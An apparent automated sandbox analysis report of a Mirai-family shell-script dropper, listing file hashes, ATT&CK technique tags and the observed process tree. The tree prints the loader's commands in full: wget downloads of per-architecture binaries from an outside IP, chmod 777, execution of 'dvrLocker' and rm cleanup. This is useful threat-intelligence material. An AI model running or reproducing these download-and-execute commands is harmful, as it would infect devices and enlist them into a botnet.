Analysis
-
max time kernel
15s -
max time network
17s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
09-11-2024 03:32
Static task
static1
Behavioral task
behavioral1
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
-
Size
923B
-
MD5
5419b553750dc94cb55eecefce2e1950
-
SHA1
bf1c8a80bcecfe13f81279a0392031d661e736ef
-
SHA256
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049
-
SHA512
fb4d326c895be35fef16ae64708323567f6cbdd66267cb61e5de47e36289189a0295a6fcc2dd8482ab143e022d79ef846da37215735cc84931aafd01b7404d6e
Malware Config
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 24 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 801 chmod 821 chmod 871 chmod 882 chmod 928 chmod 816 chmod 860 chmod 893 chmod 938 chmod 828 chmod 838 chmod 888 chmod 903 chmod 908 chmod 913 chmod 933 chmod 948 chmod 953 chmod 810 chmod 851 chmod 898 chmod 918 chmod 923 chmod 943 chmod -
Executes dropped EXE 24 IoCs
Processes:
dvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerioc pid process /tmp/lib/dvrLocker 802 dvrLocker /tmp/lib/dvrLocker 811 dvrLocker /tmp/lib/dvrLocker 817 dvrLocker /tmp/lib/dvrLocker 822 dvrLocker /tmp/lib/dvrLocker 830 dvrLocker /tmp/lib/dvrLocker 839 dvrLocker /tmp/lib/dvrLocker 852 dvrLocker /tmp/lib/dvrLocker 862 dvrLocker /mnt/dvrLocker 873 dvrLocker /mnt/dvrLocker 884 dvrLocker /mnt/dvrLocker 889 dvrLocker /mnt/dvrLocker 894 dvrLocker /mnt/dvrLocker 899 dvrLocker /mnt/dvrLocker 904 dvrLocker /mnt/dvrLocker 909 dvrLocker /mnt/dvrLocker 914 dvrLocker /mnt/dvrLocker 919 dvrLocker /mnt/dvrLocker 924 dvrLocker /mnt/dvrLocker 929 dvrLocker /mnt/dvrLocker 934 dvrLocker /mnt/dvrLocker 939 dvrLocker /mnt/dvrLocker 944 dvrLocker /mnt/dvrLocker 949 dvrLocker /mnt/dvrLocker 954 dvrLocker -
Processes:
lslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslsmkdirlslslslslslslslslslslslslslslslslsdescription ioc process File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems mkdir File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
rmwgetrmwgetrmwgetpid process 886 rm 922 wget 926 rm 807 wget 814 rm 876 wget -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.shdescription ioc process File opened for modification /tmp/lib/dvrLocker becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Processes
-
/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh1⤵
- Writes file to tmp directory
PID:660 -
/bin/lsls -l /proc/1/exe2⤵
- Reads runtime system information
PID:662 -
/bin/lsls -l /proc/10/exe2⤵
- Reads runtime system information
PID:668 -
/bin/lsls -l /proc/102/exe2⤵
- Reads runtime system information
PID:672 -
/bin/lsls -l /proc/11/exe2⤵
- Reads runtime system information
PID:675 -
/bin/lsls -l /proc/110/exe2⤵
- Reads runtime system information
PID:678 -
/bin/lsls -l /proc/112/exe2⤵
- Reads runtime system information
PID:683 -
/bin/lsls -l /proc/113/exe2⤵
- Reads runtime system information
PID:687 -
/bin/lsls -l /proc/12/exe2⤵
- Reads runtime system information
PID:690 -
/bin/lsls -l /proc/13/exe2⤵
- Reads runtime system information
PID:691 -
/bin/lsls -l /proc/14/exe2⤵
- Reads runtime system information
PID:694 -
/bin/lsls -l /proc/141/exe2⤵
- Reads runtime system information
PID:695 -
/bin/lsls -l /proc/142/exe2⤵
- Reads runtime system information
PID:698 -
/bin/lsls -l /proc/145/exe2⤵
- Reads runtime system information
PID:700 -
/bin/lsls -l /proc/15/exe2⤵
- Reads runtime system information
PID:702 -
/bin/lsls -l /proc/150/exe2⤵
- Reads runtime system information
PID:703 -
/bin/lsls -l /proc/156/exe2⤵
- Reads runtime system information
PID:704 -
/bin/lsls -l /proc/16/exe2⤵
- Reads runtime system information
PID:706 -
/bin/lsls -l /proc/17/exe2⤵
- Reads runtime system information
PID:707 -
/bin/lsls -l /proc/173/exe2⤵
- Reads runtime system information
PID:708 -
/bin/lsls -l /proc/18/exe2⤵
- Reads runtime system information
PID:709 -
/bin/lsls -l /proc/19/exe2⤵
- Reads runtime system information
PID:710 -
/bin/lsls -l /proc/2/exe2⤵PID:711
-
/bin/lsls -l /proc/20/exe2⤵
- Reads runtime system information
PID:712 -
/bin/lsls -l /proc/21/exe2⤵
- Reads runtime system information
PID:713 -
/bin/lsls -l /proc/212/exe2⤵
- Reads runtime system information
PID:714 -
/bin/lsls -l /proc/22/exe2⤵PID:715
-
/bin/lsls -l /proc/23/exe2⤵
- Reads runtime system information
PID:716 -
/bin/lsls -l /proc/24/exe2⤵
- Reads runtime system information
PID:717 -
/bin/lsls -l /proc/25/exe2⤵
- Reads runtime system information
PID:718 -
/bin/lsls -l /proc/26/exe2⤵
- Reads runtime system information
PID:719 -
/bin/lsls -l /proc/27/exe2⤵
- Reads runtime system information
PID:720 -
/bin/lsls -l /proc/272/exe2⤵
- Reads runtime system information
PID:721 -
/bin/lsls -l /proc/275/exe2⤵
- Reads runtime system information
PID:722 -
/bin/lsls -l /proc/276/exe2⤵
- Reads runtime system information
PID:723 -
/bin/lsls -l /proc/28/exe2⤵
- Reads runtime system information
PID:726 -
/bin/lsls -l /proc/287/exe2⤵
- Reads runtime system information
PID:727 -
/bin/lsls -l /proc/289/exe2⤵
- Reads runtime system information
PID:730 -
/bin/lsls -l /proc/29/exe2⤵
- Reads runtime system information
PID:731 -
/bin/lsls -l /proc/3/exe2⤵
- Reads runtime system information
PID:733 -
/bin/lsls -l /proc/306/exe2⤵
- Reads runtime system information
PID:735 -
/bin/lsls -l /proc/307/exe2⤵
- Reads runtime system information
PID:737 -
/bin/lsls -l /proc/316/exe2⤵
- Reads runtime system information
PID:739 -
/bin/lsls -l /proc/356/exe2⤵
- Reads runtime system information
PID:741 -
/bin/lsls -l /proc/4/exe2⤵
- Reads runtime system information
PID:743 -
/bin/lsls -l /proc/41/exe2⤵
- Reads runtime system information
PID:744 -
/bin/lsls -l /proc/42/exe2⤵
- Reads runtime system information
PID:747 -
/bin/lsls -l /proc/43/exe2⤵
- Reads runtime system information
PID:748 -
/bin/lsls -l /proc/5/exe2⤵
- Reads runtime system information
PID:750 -
/bin/lsls -l /proc/594/exe2⤵
- Reads runtime system information
PID:752 -
/bin/lsls -l /proc/6/exe2⤵
- Reads runtime system information
PID:754 -
/bin/lsls -l /proc/611/exe2⤵
- Reads runtime system information
PID:756 -
/bin/lsls -l /proc/612/exe2⤵
- Reads runtime system information
PID:757 -
/bin/lsls -l /proc/614/exe2⤵
- Reads runtime system information
PID:760 -
/bin/lsls -l /proc/615/exe2⤵
- Reads runtime system information
PID:761 -
/bin/lsls -l /proc/646/exe2⤵
- Reads runtime system information
PID:763 -
/bin/lsls -l /proc/652/exe2⤵
- Reads runtime system information
PID:765 -
/bin/lsls -l /proc/653/exe2⤵
- Reads runtime system information
PID:767 -
/bin/lsls -l /proc/655/exe2⤵
- Reads runtime system information
PID:769 -
/bin/lsls -l /proc/657/exe2⤵PID:770
-
/bin/lsls -l /proc/658/exe2⤵
- Reads runtime system information
PID:773 -
/bin/lsls -l /proc/659/exe2⤵
- Reads runtime system information
PID:774 -
/bin/lsls -l /proc/660/exe2⤵
- Reads runtime system information
PID:776 -
/bin/lsls -l /proc/661/exe2⤵PID:778
-
/bin/lsls -l /proc/7/exe2⤵
- Reads runtime system information
PID:780 -
/bin/lsls -l /proc/8/exe2⤵
- Reads runtime system information
PID:781 -
/bin/lsls -l /proc/80/exe2⤵
- Reads runtime system information
PID:783 -
/bin/lsls -l /proc/9/exe2⤵
- Reads runtime system information
PID:785 -
/bin/rmrm -rf /tmp/lib/2⤵PID:789
-
/bin/rmrm -rf /tmp/lib/dvrLocker2⤵PID:790
-
/bin/mkdirmkdir /tmp/lib/2⤵
- Reads runtime system information
PID:791 -
/usr/bin/wgetwget http://45.202.35.91/tmpsl -O -2⤵PID:793
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:801 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:802 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:802
-
/bin/rmrm -rf tmpsl2⤵PID:805
-
/usr/bin/wgetwget http://45.202.35.91/tmips -O -2⤵
- System Network Configuration Discovery
PID:807 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:810 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:811 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:811
-
/bin/rmrm -rf tmips2⤵
- System Network Configuration Discovery
PID:814 -
/usr/bin/wgetwget http://45.202.35.91/tarm -O -2⤵PID:815
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:816 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:817 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:817
-
/bin/rmrm -rf tarm2⤵PID:819
-
/usr/bin/wgetwget http://45.202.35.91/tarm5 -O -2⤵PID:820
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:821 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:822 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:822
-
/bin/rmrm -rf tarm52⤵PID:825
-
/usr/bin/wgetwget http://45.202.35.91/tppc -O -2⤵PID:826
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:828 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:830 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:830
-
/bin/rmrm -rf tppc2⤵PID:832
-
/usr/bin/wgetwget http://45.202.35.91/tarm7 -O -2⤵PID:833
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:838 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:839 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:839
-
/bin/rmrm -rf tarm72⤵PID:842
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:843
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:851 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:852 -
/bin/rmrm -rf x862⤵PID:855
-
/usr/bin/wgetwget http://45.202.35.91/tarm6 -O -2⤵PID:856
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:860 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:862 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:862
-
/bin/rmrm -rf tarm62⤵PID:865
-
/bin/rmrm -rf /mnt/dvrLocker2⤵PID:866
-
/usr/bin/wgetwget http://45.202.35.91/tmpsl -O -2⤵PID:867
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:871 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:873 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:873
-
/bin/rmrm -rf tmpsl2⤵PID:875
-
/usr/bin/wgetwget http://45.202.35.91/tmips -O -2⤵
- System Network Configuration Discovery
PID:876 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:882 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:884 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:884
-
/bin/rmrm -rf tmips2⤵
- System Network Configuration Discovery
PID:886 -
/usr/bin/wgetwget http://45.202.35.91/tarm -O -2⤵PID:887
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:888 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:889 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:889
-
/bin/rmrm -rf tarm2⤵PID:891
-
/usr/bin/wgetwget http://45.202.35.91/tarm5 -O -2⤵PID:892
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:893 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:894 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:894
-
/bin/rmrm -rf tarm52⤵PID:896
-
/usr/bin/wgetwget http://45.202.35.91/tppc -O -2⤵PID:897
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:898 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:899 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:899
-
/bin/rmrm -rf tppc2⤵PID:901
-
/usr/bin/wgetwget http://45.202.35.91/tarm7 -O -2⤵PID:902
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:903 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:904 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:904
-
/bin/rmrm -rf tarm72⤵PID:906
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:907
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:908 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:909 -
/bin/rmrm -rf x862⤵PID:911
-
/usr/bin/wgetwget http://45.202.35.91/tarm6 -O -2⤵PID:912
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:913 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:914 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:914
-
/bin/rmrm -rf tarm62⤵PID:916
-
/usr/bin/wgetwget http://45.202.35.91/tmpsl -O -2⤵PID:917
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:918 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:919 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:919
-
/bin/rmrm -rf tmpsl2⤵PID:921
-
/usr/bin/wgetwget http://45.202.35.91/tmips -O -2⤵
- System Network Configuration Discovery
PID:922 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:923 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:924 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:924
-
/bin/rmrm -rf tmips2⤵
- System Network Configuration Discovery
PID:926 -
/usr/bin/wgetwget http://45.202.35.91/tarm -O -2⤵PID:927
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:928 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:929 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:929
-
/bin/rmrm -rf tarm2⤵PID:931
-
/usr/bin/wgetwget http://45.202.35.91/tarm5 -O -2⤵PID:932
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:933 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:934 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:934
-
/bin/rmrm -rf tarm52⤵PID:936
-
/usr/bin/wgetwget http://45.202.35.91/tppc -O -2⤵PID:937
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:938 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:939 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:939
-
/bin/rmrm -rf tppc2⤵PID:941
-
/usr/bin/wgetwget http://45.202.35.91/tarm7 -O -2⤵PID:942
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:943 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:944 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:944
-
/bin/rmrm -rf tarm72⤵PID:946
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:947
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:948 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:949 -
/bin/rmrm -rf x862⤵PID:951
-
/usr/bin/wgetwget http://45.202.35.91/tarm6 -O -2⤵PID:952
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:953 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:954 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:954
-
/bin/rmrm -rf tarm62⤵PID:956
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
93KB
MD5bb9275394716c60d1941432c7085ca13
SHA143f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
SHA2563c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
SHA512047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d